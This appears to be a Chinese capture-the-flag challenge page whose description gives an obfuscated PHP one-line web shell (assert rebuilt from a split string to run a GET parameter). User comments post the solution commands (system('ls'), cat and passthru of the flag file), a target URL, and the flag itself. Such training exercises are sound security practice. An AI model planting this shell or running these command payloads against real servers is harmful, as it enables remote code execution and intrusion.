shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8347
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
falg 2年前

就是一般的命令执行,先拿到index.php然后后面?s=system("ls")查看flaga15808abee46a1d5.txt文件,接着?s=system("cat ./flaga15808abee46a1d5.txt")得到flag

回复 1

bt7274 2年前

assert($_GET['s'])

回复 0

04secbug 2年前

s=system('ls') s=system('cat flag')

回复 1

JJhello 2年前

rnm,退钱

回复 2

wxy1343 2年前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

wxy1343 2年前

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我爱你制杖 3年前

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1

xclay 3年前

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4

2224525664 3年前

没有提示的话这题是不是就做不出来了?

回复 1

Miludear 3年前

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2

WriteUp

image
harry

3 金币

评分(10)

解题动态

warm007 攻破了该题 2小时前
R1 攻破了该题 6小时前
a591961189 攻破了该题 8小时前
阿杰学网安 攻破了该题 9小时前
yxm8085 攻破了该题 10小时前
xtelnet 攻破了该题 14小时前
dcd 攻破了该题 15小时前
bbbuild 攻破了该题 1天前
yy147369 攻破了该题 1天前
yiyiyiyi1 攻破了该题 1天前
搁浅的小鱼 攻破了该题 1天前
aaggyy1 攻破了该题 1天前
18737958336 攻破了该题 1天前
yehlg 攻破了该题 1天前
zzasas 攻破了该题 1天前
mybugku26 攻破了该题 1天前
sfwy 攻破了该题 1天前
天青色等烟雨 攻破了该题 1天前
沐恩 攻破了该题 1天前
a637814143 攻破了该题 2天前
问题反馈